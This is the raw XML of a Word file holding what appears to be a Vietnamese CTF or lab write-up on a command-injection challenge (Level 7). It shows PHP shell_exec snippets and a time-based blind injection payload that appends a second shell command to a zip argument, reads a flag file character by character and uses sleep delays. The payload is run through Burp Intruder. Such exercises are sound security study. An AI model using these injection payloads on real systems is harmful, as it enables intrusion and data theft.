              <w:t>// case "ping":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7359E775" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 ping -c 4 $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1156B5" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43384A7A" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "nslookup":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="618DF34C" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 nslookup $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DBBA7AB" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="431C04AB" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "dig":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24EBDAC8" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 dig $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0734E926" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E11D04" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E22DD7F" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E"/>
          <w:p w14:paraId="5A983012" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7901B3" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F57E25F" w14:textId="77777777" w:rsidR="004E7DB6" w:rsidRDefault="004E7DB6"/>
    <w:p w14:paraId="44E5B327" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:t>Level 7 có một thay đổi quan trọng trong logic xử lý so với các level trước: hệ thống không kiểm tra kết quả thực thi lệnh zip, mà thay vào đó trả về phản hồi cố định:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16B76F" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:t xml:space="preserve">die("Đã chạy câu lệnh backup"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187F61D" w14:textId="7DA2FB2F" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:t>Phân tích điểm khác biệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F999BE" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:lastRenderedPageBreak/>
        <w:t>Ở các level trước, hệ thống kiểm tra chuỗi "zip error" trong kết quả để xác định thành công/thất bại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BD462" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:t>Tại Level 7, bất kể lệnh zip có thực thi hay không, hệ thống luôn trả về "Đã chạy câu lệnh backup".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F7C95" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="002A53A0" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002A53A0">
        <w:t>→ Điều này khiến các kỹ thuật như Boolean-based hoặc time-based trở nên khó áp dụng trực tiếp, vì không còn sự khác biệt trong phản hồi để suy luận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51676706" w14:textId="77777777" w:rsidR="002A53A0" w:rsidRPr="008566A5" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46863146" w14:textId="00D8F298" w:rsidR="000A0A7D" w:rsidRPr="000A0A7D" w:rsidRDefault="000A0A7D" w:rsidP="000A0A7D">
      <w:r w:rsidRPr="000A0A7D">
        <w:t>Thay vì áp dụng kỹ thuật Boolean-based để suy luận kết quả thông qua điều kiện logic, tôi chuyển sang sử dụng kỹ thuật time-based bằng lệnh sleep. Việc này cho phép xác định khả năng thực thi lệnh thông qua độ trễ phản hồi của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698B081" w14:textId="2C42F0A0" w:rsidR="00137E91" w:rsidRPr="00137E91" w:rsidRDefault="002A53A0" w:rsidP="002A53A0">
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2A92E" w14:textId="2A033F83" w:rsidR="002A53A0" w:rsidRDefault="00137E91" w:rsidP="00A76EF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì mình biết ký tự đầu tiên trong flag là C nên mình sẽ thử câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00597F8F">
        <w:t>test.</w:t>
      </w:r>
      <w:r w:rsidRPr="00137E91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zip -r /var/www/html/index.php 2&gt;&amp;1; if [ "$(cat /*.txt | cut -c 1)" = "</w:t>
      </w:r>
      <w:r w:rsidR="00A76EF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00137E91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" ]; then sleep 5</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00137E91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> fi #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nếu như </w:t>
      </w:r>
      <w:r w:rsidR="00A76EF4">
        <w:t>phản hồi này trên 5 giây thì chứng tỏ câu lệnh này đúng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17402F1B" w14:textId="2D08E456" w:rsidR="00D6589E" w:rsidRDefault="00C93419">
      <w:r w:rsidRPr="00C93419">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492C774E" wp14:editId="3F150E2A">
            <wp:extent cx="5731510" cy="1584325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1689348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48083" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1584325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A67CE4" w14:textId="6FCE5BDC" w:rsidR="00A76EF4" w:rsidRDefault="00A76EF4">
      <w:r>
        <w:t>Kết quả cho thấy phản hồi quá 5s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50065F35" w14:textId="11623B35" w:rsidR="00A76EF4" w:rsidRDefault="00A76EF4">
      <w:r>
        <w:t>Thực hiện thay C = c để tạo điều kiện sai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDDA3A" w14:textId="7AD61BE5" w:rsidR="00F33455" w:rsidRDefault="00F33455">
      <w:r w:rsidRPr="00F33455">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02F90FFD" wp14:editId="5AB60E88">
            <wp:extent cx="5731510" cy="1569085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="35499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9114" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1569085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6668D" w14:textId="3479AB9F" w:rsidR="00A76EF4" w:rsidRDefault="00A76EF4">
      <w:r>
        <w:t>Kết quả phản hồi dưới 5s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E4626" w14:textId="3AB9C782" w:rsidR="00A76EF4" w:rsidRDefault="00A76EF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04278A6A" w14:textId="1998ACB7" w:rsidR="009D1192" w:rsidRDefault="00A76EF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Từ đây mình sẽ chạy intruder để kiểm tra. Và vì thời gian khá lộn xộn nên để sắp xếp lại sẽ mất thời gian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4AB95" w14:textId="5997ECCA" w:rsidR="00142793" w:rsidRDefault="00142793">
      <w:r w:rsidRPr="00142793">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3463E3D7" wp14:editId="06A11294">
            <wp:extent cx="5731510" cy="2010410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1249435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35189" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2010410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D6160" w14:textId="77777777" w:rsidR="00996181" w:rsidRDefault="00996181"/>
    <w:p w14:paraId="65438264" w14:textId="1C397987" w:rsidR="00996181" w:rsidRPr="00E71537" w:rsidRDefault="00996181"/>
    <w:sectPr w:rsidR="00996181" w:rsidRPr="00E715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70D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52CE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727FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ACC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C1485"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C81E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736E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1060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656F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ACC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17DF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ACC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556175"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ACC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5D4275"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F7C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784265">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="482352685">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1151798310">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="52972742">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1716393093">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1031032049">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="552742651">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="774795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AFA"/>
    <w:rsid w:val="000068F1"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="000253D3"/>
    <w:rsid w:val="000321AC"/>
    <w:rsid w:val="00060CBB"/>
    <w:rsid w:val="00090903"/>
    <w:rsid w:val="00090F64"/>
    <w:rsid w:val="0009610B"/>
    <w:rsid w:val="000A0A7D"/>
    <w:rsid w:val="000A18FF"/>
    <w:rsid w:val="000A1BFF"/>
    <w:rsid w:val="000E64EB"/>
    <w:rsid w:val="00137E91"/>
    <w:rsid w:val="00142793"/>
    <w:rsid w:val="00152C8C"/>
    <w:rsid w:val="0016097C"/>
    <w:rsid w:val="001B671E"/>
    <w:rsid w:val="001B7A80"/>
    <w:rsid w:val="001D6E80"/>
    <w:rsid w:val="001E489D"/>
    <w:rsid w:val="001F6071"/>
    <w:rsid w:val="00294680"/>
    <w:rsid w:val="002A53A0"/>
    <w:rsid w:val="002B1622"/>
    <w:rsid w:val="002E3F55"/>
    <w:rsid w:val="002F1569"/>
    <w:rsid w:val="00304448"/>
    <w:rsid w:val="00320FCC"/>
    <w:rsid w:val="00336C1C"/>
    <w:rsid w:val="003402FD"/>
    <w:rsid w:val="00374264"/>
    <w:rsid w:val="00374653"/>
    <w:rsid w:val="00376AFA"/>
    <w:rsid w:val="00390791"/>
    <w:rsid w:val="003958BD"/>
    <w:rsid w:val="003968C7"/>
    <w:rsid w:val="003B25AC"/>
    <w:rsid w:val="003B3554"/>
    <w:rsid w:val="003D7D48"/>
    <w:rsid w:val="004053C8"/>
    <w:rsid w:val="00406249"/>
    <w:rsid w:val="004212A3"/>
    <w:rsid w:val="00425110"/>
    <w:rsid w:val="00427E13"/>
    <w:rsid w:val="00436A87"/>
    <w:rsid w:val="0046240F"/>
    <w:rsid w:val="00462765"/>
    <w:rsid w:val="00467C59"/>
    <w:rsid w:val="004C1F2B"/>
    <w:rsid w:val="004E45DE"/>
    <w:rsid w:val="004E7DB6"/>
    <w:rsid w:val="00580DA3"/>
    <w:rsid w:val="00591128"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="00597F8F"/>
    <w:rsid w:val="005C6D63"/>
    <w:rsid w:val="005E69D3"/>
    <w:rsid w:val="00615A3F"/>
    <w:rsid w:val="00671704"/>
    <w:rsid w:val="006724D1"/>
    <w:rsid w:val="00675C21"/>
    <w:rsid w:val="0068050B"/>
    <w:rsid w:val="00695D52"/>
    <w:rsid w:val="0069799F"/>
    <w:rsid w:val="006A27AA"/>
    <w:rsid w:val="006A7A3F"/>
    <w:rsid w:val="006D414F"/>
    <w:rsid w:val="006F66D8"/>
    <w:rsid w:val="006F7FE5"/>
    <w:rsid w:val="00741D5D"/>
    <w:rsid w:val="00776F32"/>
    <w:rsid w:val="00790E5A"/>
    <w:rsid w:val="00803CD7"/>
    <w:rsid w:val="008237C1"/>
    <w:rsid w:val="008566A5"/>
    <w:rsid w:val="00867762"/>
    <w:rsid w:val="00873F18"/>
    <w:rsid w:val="0088575B"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="0091419B"/>
    <w:rsid w:val="00944684"/>
    <w:rsid w:val="00981355"/>
    <w:rsid w:val="0098336C"/>
    <w:rsid w:val="00996181"/>
    <w:rsid w:val="009A2CAD"/>
    <w:rsid w:val="009D1192"/>
    <w:rsid w:val="009D66D9"/>
    <w:rsid w:val="009F0A3A"/>
    <w:rsid w:val="00A6673A"/>
    <w:rsid w:val="00A76EF4"/>
    <w:rsid w:val="00A97CCE"/>
    <w:rsid w:val="00AE368B"/>
    <w:rsid w:val="00B1505E"/>
    <w:rsid w:val="00B269BB"/>
    <w:rsid w:val="00B271F4"/>
    <w:rsid w:val="00B41EC0"/>
    <w:rsid w:val="00B4774B"/>
    <w:rsid w:val="00B5377B"/>
    <w:rsid w:val="00B55CB4"/>
    <w:rsid w:val="00B60C5E"/>
    <w:rsid w:val="00B831F2"/>
    <w:rsid w:val="00BB06E7"/>
    <w:rsid w:val="00BE2A26"/>
    <w:rsid w:val="00C35326"/>
    <w:rsid w:val="00C63FE3"/>
    <w:rsid w:val="00C93419"/>
    <w:rsid w:val="00CC2975"/>
    <w:rsid w:val="00CF4644"/>
    <w:rsid w:val="00D028AA"/>
    <w:rsid w:val="00D252C6"/>
    <w:rsid w:val="00D32F54"/>
    <w:rsid w:val="00D369AF"/>
    <w:rsid w:val="00D6589E"/>
    <w:rsid w:val="00D65E83"/>
    <w:rsid w:val="00D75FE4"/>
    <w:rsid w:val="00D77034"/>
    <w:rsid w:val="00D851C8"/>
    <w:rsid w:val="00D863F0"/>
    <w:rsid w:val="00DB0260"/>
    <w:rsid w:val="00DB597E"/>
    <w:rsid w:val="00DC25D6"/>
    <w:rsid w:val="00DC5403"/>
    <w:rsid w:val="00DD52A1"/>
    <w:rsid w:val="00DE4E09"/>
    <w:rsid w:val="00E05128"/>
    <w:rsid w:val="00E11FC1"/>
    <w:rsid w:val="00E1321F"/>
    <w:rsid w:val="00E24801"/>
    <w:rsid w:val="00E54E97"/>
    <w:rsid w:val="00E71537"/>
    <w:rsid w:val="00EA116F"/>
    <w:rsid w:val="00EA183C"/>
    <w:rsid w:val="00EC478D"/>
    <w:rsid w:val="00ED1A66"/>
    <w:rsid w:val="00ED2A63"/>
    <w:rsid w:val="00EE1C5B"/>
    <w:rsid w:val="00EF2721"/>
    <w:rsid w:val="00F0059F"/>
    <w:rsid w:val="00F0623B"/>
    <w:rsid w:val="00F1330F"/>
    <w:rsid w:val="00F14B30"/>
    <w:rsid w:val="00F166D1"/>
    <w:rsid w:val="00F33455"/>
    <w:rsid w:val="00F47727"/>
    <w:rsid w:val="00F51943"/>
    <w:rsid w:val="00F63D8E"/>
    <w:rsid w:val="00F90CC3"/>
    <w:rsid w:val="00FC0ADE"/>
    <w:rsid w:val="00FC450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884FB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4F0C606E-0600-435D-AB02-5E691FFAB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A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A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6A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A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A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A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A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6A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A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A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AFA"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00376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AFA"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00376AFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00376AFA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00376AFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00376A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AFA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00376AFA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00376AFA"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00376AFA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
